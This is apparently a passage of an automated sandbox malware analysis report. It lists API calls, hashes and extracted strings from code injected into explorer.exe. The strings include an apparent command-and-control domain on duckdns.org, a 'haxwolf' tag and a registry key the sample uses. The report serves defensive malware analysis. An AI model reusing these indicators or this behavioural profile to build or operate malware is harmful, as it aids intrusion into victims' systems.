                          • Instruction ID: f583519df44dd3d1bcae6d090553f89ee116fcf43973d2641bebedfdd523771d
                          • Opcode Fuzzy Hash: 3debd0d67c792c8ed78d53c9fb1e462fadb46e27df6da0f3ab6e728a298b66de
                          • Instruction Fuzzy Hash: 34611776228A848BD768DF19E48439AB7B0F7C5B94F104129FB9A83B68CB7DC455CF00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFileFreeHandle$AllocCreateWritelstrcpy
                          • String ID: .DLL
                          • API String ID: 3665100274-899428287
                          • Opcode ID: fadf7f4ced62afc3b5a9d5cf5047a3c075f10af8471f2c9751082e67500787e9
                          • Instruction ID: d4f9a81e87c932e3dfceefa904636de998290c273cd79eca637867d81e950db5
                          • Opcode Fuzzy Hash: fadf7f4ced62afc3b5a9d5cf5047a3c075f10af8471f2c9751082e67500787e9
                          • Instruction Fuzzy Hash: 7B511676208A84C6D729DB18F8843DAB7A1F388798F400225E7DD87BA8DB7DC595CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Allocgethostbynameinet_addrtype_info::_name_internal_method
                          • String ID:
                          • API String ID: 156840946-0
                          • Opcode ID: 098c5ea84026b567fb2971d524b6f063d13c904a181ddb1c622f1b57d480886b
                          • Instruction ID: 4d39b6a8363a61b68098eb7a2f2ae6e1984eeb051616a6a180a1bc6076313814
                          • Opcode Fuzzy Hash: 098c5ea84026b567fb2971d524b6f063d13c904a181ddb1c622f1b57d480886b
                          • Instruction Fuzzy Hash: 9341A876618E4486DB24DB25F48435AB7B0F7C8B98F500625EA8E83B28DF3CC5418B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 6516c26c68dd897548ead927ca7065ad2063d221f15682583de06161732488cb
                          • Instruction ID: 6f407d3e16cd725d7773616dcd92840e552feadbcd761eedfa853d9f7c7713a6
                          • Opcode Fuzzy Hash: 6516c26c68dd897548ead927ca7065ad2063d221f15682583de06161732488cb
                          • Instruction Fuzzy Hash: 66413C74210D0882F71DBB29ED987E46765FB90B59F540239E72A866B0CF7D98CBC740
                          APIs
                          • SHGetKnownFolderPath.SHELL32 ref: 0119F67A
                          • LocalAlloc.KERNEL32 ref: 0119F692
                          • wnsprintfW.SHLWAPI ref: 0119F6CF
                          • LocalFree.KERNEL32 ref: 0119F76B
                            • Part of subcall function 0119ECE0: AllocateAndInitializeSid.ADVAPI32 ref: 0119ED6A
                            • Part of subcall function 0119ECE0: SetEntriesInAclW.ADVAPI32 ref: 0119EDE6
                            • Part of subcall function 0119ECE0: LocalAlloc.KERNEL32 ref: 0119EE01
                            • Part of subcall function 0119ECE0: InitializeSecurityDescriptor.ADVAPI32 ref: 0119EE27
                            • Part of subcall function 0119ECE0: SetSecurityDescriptorDacl.ADVAPI32 ref: 0119EE46
                          • CreateDirectoryW.KERNEL32 ref: 0119F713
                          • GetLastError.KERNEL32 ref: 0119F71E
                          • LocalFree.KERNEL32 ref: 0119F730
                          • LocalFree.KERNEL32 ref: 0119F73B
                          • CoTaskMemFree.COMBASE ref: 0119F746
                          • LocalFree.KERNEL32 ref: 0119F760
                          • CoTaskMemFree.COMBASE ref: 0119F776
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$AllocDescriptorInitializeSecurityTask$AllocateCreateDaclDirectoryEntriesErrorFolderKnownLastPathwnsprintf
                          • String ID: %s\%s
                          • API String ID: 161627884-4073750446
                          • Opcode ID: 97f7bb4be75a825a017a6bf767e0d77951ba7becd1f95d9ba2ae187a95026964
                          • Instruction ID: ce026f9075a8c0bccdb7d66972b1ad2803664245da1defe68a753da2186a1645
                          • Opcode Fuzzy Hash: 97f7bb4be75a825a017a6bf767e0d77951ba7becd1f95d9ba2ae187a95026964
                          • Instruction Fuzzy Hash: 0A31EA75128E8582EB58AF14E8843DE7761F7C4B89F500425F79A86A68DF7DC446CB00
                          APIs
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • LocalFree.KERNEL32 ref: 011A659C
                          • LocalFree.KERNEL32 ref: 011A65AF
                          • LocalAlloc.KERNEL32 ref: 011A6607
                          • LocalAlloc.KERNEL32 ref: 011A6628
                          • lstrcpyW.KERNEL32 ref: 011A6660
                          • lstrcpyW.KERNEL32 ref: 011A6679
                          • lstrcpyW.KERNEL32 ref: 011A6692
                          • LocalFree.KERNEL32 ref: 011A6750
                          • LocalFree.KERNEL32 ref: 011A675B
                          • LocalFree.KERNEL32 ref: 011A6766
                          • LocalFree.KERNEL32 ref: 011A677A
                          • LocalFree.KERNEL32 ref: 011A6785
                          • VirtualFree.KERNEL32 ref: 011A67C5
                          • LocalFree.KERNEL32 ref: 011A67D0
                          • LocalFree.KERNEL32 ref: 011A67DB
                          • LocalFree.KERNEL32 ref: 011A67E6
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$lstrcpywnsprintf$FolderKnownPathTaskVirtuallstrlen
                          • String ID:
                          • API String ID: 2329222747-0
                          • Opcode ID: b2b08f411e76d6a630806418241aaa0efaa41a980625a12dbe5a1e2a6f1351cf
                          • Instruction ID: e52f5c60e4ae20f7eed17e807abe8187e73bb3da7924f3f3ccf1a6786cb7c088
                          • Opcode Fuzzy Hash: b2b08f411e76d6a630806418241aaa0efaa41a980625a12dbe5a1e2a6f1351cf
                          • Instruction Fuzzy Hash: 2D71E47A228E8482DB18DF55F49439ABB61F7C4B94F544125EB8A83B68DF7CC489CF40
                          APIs
                          • LocalAlloc.KERNEL32 ref: 01191DE5
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 01191E0C
                          • Process32FirstW.KERNEL32 ref: 01191E35
                          • CloseHandle.KERNEL32 ref: 01192091
                            • Part of subcall function 011932E0: type_info::_name_internal_method.LIBCMTD ref: 0119332E
                          • lstrcmpiW.KERNEL32 ref: 01191F13
                          • lstrcpyW.KERNEL32 ref: 01191F63
                          • _LDint.LIBCPMTD ref: 01191F75
                          • lstrcpyW.KERNEL32 ref: 01191FB2
                            • Part of subcall function 01192290: construct.LIBCPMTD ref: 01192346
                          • StrCatW.SHLWAPI ref: 01192006
                          • StrCatW.SHLWAPI ref: 01192019
                          • Process32NextW.KERNEL32 ref: 0119207E
                          • LocalFree.KERNEL32 ref: 011920A3
                          • std::rethrow_exception.LIBCMTD ref: 011920C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalProcess32lstrcpy$AllocCloseCreateDintFirstFreeHandleNextSnapshotToolhelp32constructlstrcmpistd::rethrow_exceptiontype_info::_name_internal_method
                          • String ID:
                          • API String ID: 572146554-0
                          • Opcode ID: 20566815292768ddb19e3fe208de43c1b9bb3c51e70477ea2d05641755ccb36c
                          • Instruction ID: 224216776de8c12c743778cba3ee6d451239d4a5a62232e428fcc5f7b73112df
                          • Opcode Fuzzy Hash: 20566815292768ddb19e3fe208de43c1b9bb3c51e70477ea2d05641755ccb36c
                          • Instruction Fuzzy Hash: 8771FD72209A85A2DB38DB14E8943DEB361F7D4798F404226D79D87AA8EF7CC645CB40
                          APIs
                          • __free_lconv_mon.LIBCMT ref: 011BE298
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1DF2
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E04
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E16
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E28
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E3A
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E4C
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E5E
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E70
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E82
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E94
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1EA9
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1EBE
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1ED3
                          • free.LIBCMT ref: 011BE28C
                            • Part of subcall function 011BC600: RtlFreeHeap.NTDLL(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC616
                            • Part of subcall function 011BC600: _errno.LIBCMT ref: 011BC620
                            • Part of subcall function 011BC600: GetLastError.KERNEL32(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC628
                          • free.LIBCMT ref: 011BE2AE
                          • __free_lconv_num.LIBCMT ref: 011BE2BA
                          • free.LIBCMT ref: 011BE2C6
                          • free.LIBCMT ref: 011BE2D2
                          • free.LIBCMT ref: 011BE2F6
                          • free.LIBCMT ref: 011BE30A
                          • free.LIBCMT ref: 011BE319
                          • free.LIBCMT ref: 011BE325
                          • free.LIBCMT ref: 011BE352
                          • free.LIBCMT ref: 011BE37A
                          • free.LIBCMT ref: 011BE394
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                          • String ID:
                          • API String ID: 518839503-0
                          • Opcode ID: cc960a244bba1296957b4ba8555efbb7737ec31058a46dae0789a04b08781b71
                          • Instruction ID: 7dc608d96ce2035b2b5e0d43347616bdd6dddd184e6c13cc3635041a4056b052
                          • Opcode Fuzzy Hash: cc960a244bba1296957b4ba8555efbb7737ec31058a46dae0789a04b08781b71
                          • Instruction Fuzzy Hash: F4310632A07A8188EF2EDF69C4E07EC2760EB98B98F085535CB0A5A764CF28D091C351
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$CloseHandle$AllocCreateDirectoryObjectProcessSingleSystemWaitlstrlen
                          • String ID: h
                          • API String ID: 1515568942-2439710439
                          • Opcode ID: 86f9bf02f743d2894e55c04eb65c7a6281638eb6958314ddbfe74eab8205a53b
                          • Instruction ID: 7d1fbac3d5c6dda3523df7dad649055ccfd4f7ee90450cba2606d0ec06be5bee
                          • Opcode Fuzzy Hash: 86f9bf02f743d2894e55c04eb65c7a6281638eb6958314ddbfe74eab8205a53b
                          • Instruction Fuzzy Hash: D6510772218BC586EB749B14F4983DAB3A1F788758F400229DB9947BA9DF7CC084CF04
                          APIs
                          • lstrcpyA.KERNEL32 ref: 011B70E4
                          • WaitForMultipleObjects.KERNEL32 ref: 011B7138
                          • WaitForSingleObject.KERNEL32 ref: 011B714B
                          • lstrcpyA.KERNEL32 ref: 011B71A0
                          • ReleaseMutex.KERNEL32 ref: 011B71BA
                          • ReleaseMutex.KERNEL32 ref: 011B715F
                            • Part of subcall function 011B52E0: lstrlenW.KERNEL32 ref: 011B531D
                            • Part of subcall function 011B52E0: setsockopt.WS2_32 ref: 011B541C
                          • lstrcpyA.KERNEL32 ref: 011B722D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$MutexReleaseWait$MultipleObjectObjectsSinglelstrlensetsockopt
                          • String ID: haxwolf$jholo.duckdns.org
                          • API String ID: 864648930-688611332
                          • Opcode ID: fecf3f146bdccc097897548b89d67b5fd197065297feea364247b3118dd6945e
                          • Instruction ID: e46d4d3a7e7d58d231c486c4c9c03d94863ff19648d1739dd4977ac574b05047
                          • Opcode Fuzzy Hash: fecf3f146bdccc097897548b89d67b5fd197065297feea364247b3118dd6945e
                          • Instruction Fuzzy Hash: 9151D435218B8186EB58DF94F8843DAB7A5F784754F40012AEA8E83BA4EF7DD546CB40
                          APIs
                          • LocalAlloc.KERNEL32 ref: 01199251
                          • GetSystemDirectoryW.KERNEL32 ref: 01199272
                          • LocalFree.KERNEL32 ref: 011993E6
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • LocalAlloc.KERNEL32 ref: 011992AC
                          • LocalFree.KERNEL32 ref: 011993DB
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • CreateProcessW.KERNEL32 ref: 01199398
                          • LocalFree.KERNEL32 ref: 011993A8
                          • LocalFree.KERNEL32 ref: 011993B3
                          • LocalFree.KERNEL32 ref: 011993BE
                          • LocalFree.KERNEL32 ref: 011993D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$lstrlen$Alloc$CreateDirectoryFolderKnownPathProcessSystemTask_errno_invalid_parameter_noinfo
                          • String ID: h
                          • API String ID: 2101662253-2439710439
                          • Opcode ID: 81c729fb1548c2497bd964f0e68264aaa04e06b1614a93f71b7eab89c15ca4a2
                          • Instruction ID: 138e177c477f6807f36f359a0050e299873e983373bed3f5e740a69340a1e482
                          • Opcode Fuzzy Hash: 81c729fb1548c2497bd964f0e68264aaa04e06b1614a93f71b7eab89c15ca4a2
                          • Instruction Fuzzy Hash: A2411436218A8582E7249B65F88439EB7A1F7C4754F404129EB8E47BA8CF7DC559CB80
                          APIs
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • _LDint.LIBCPMTD ref: 011A77FF
                          • RegOpenKeyExW.ADVAPI32 ref: 011A7873
                          • RegQueryValueExW.ADVAPI32 ref: 011A78AF
                          • RegCloseKey.ADVAPI32 ref: 011A78BE
                          • LocalFree.KERNEL32 ref: 011A78C9
                          • LocalFree.KERNEL32 ref: 011A78D4
                          • RegCloseKey.ADVAPI32 ref: 011A78E6
                          • LocalFree.KERNEL32 ref: 011A78F1
                          • LocalFree.KERNEL32 ref: 011A78FC
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          Strings
                          • {A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}, xrefs: 011A7837
                          • SOFTWARE\%s, xrefs: 011A783E
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AllocClosewnsprintf$DintOpenQueryValue_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 3338012236-4275378529
                          • Opcode ID: 23279cb71c4bd6c0847ceeffee9e97ff6c10eb49710966fc57f16e99fcffcdd2
                          • Instruction ID: e45a445577a9956b95e7c1a89b50dc89b77e368c6014a75ed7b404d745879f49
                          • Opcode Fuzzy Hash: 23279cb71c4bd6c0847ceeffee9e97ff6c10eb49710966fc57f16e99fcffcdd2
                          • Instruction Fuzzy Hash: 5C314C76228A8482D754DF24F89479AB761FBC4794F801526FB8A83B68DF7DC545CB00
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B5CF1
                          • lstrcpyW.KERNEL32 ref: 011B5D35
                            • Part of subcall function 011ADEF0: AllocateAndInitializeSid.ADVAPI32 ref: 011ADF62
                            • Part of subcall function 011ADEF0: CheckTokenMembership.ADVAPI32 ref: 011ADF7F
                            • Part of subcall function 011ADEF0: FreeSid.ADVAPI32 ref: 011ADF96
                          • GetModuleFileNameW.KERNEL32 ref: 011B5D55
                          • LocalFree.KERNEL32 ref: 011B5D64
                          • LocalFree.KERNEL32 ref: 011B5D9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                          • String ID: %s [%d]$CRYPTEDBYTE
                          • API String ID: 2255487582-4036669475
                          • Opcode ID: 235aeaa75262449ed08cf0da43ebc2be91080f72e874cb04567873c9e88faed6
                          • Instruction ID: e0e27280d61e260c6c3b66b2804a41e7dbf6c7a645afc1f51d143e5feccb5549
                          • Opcode Fuzzy Hash: 235aeaa75262449ed08cf0da43ebc2be91080f72e874cb04567873c9e88faed6
                          • Instruction Fuzzy Hash: 29311C71218A8586DB989F55E8883DE67A1F7C8788F400125E78F87B74DF7DC085CB40
                          APIs
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994C7
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994F1
                          • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199522
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199535
                          • CoTaskMemFree.COMBASE(?,?,?,?,?,?,?,?,?,?,01199412), ref: 011995AA
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 0119958D
                          • CoTaskMemFree.COMBASE(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199598
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 011995B5
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011995C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
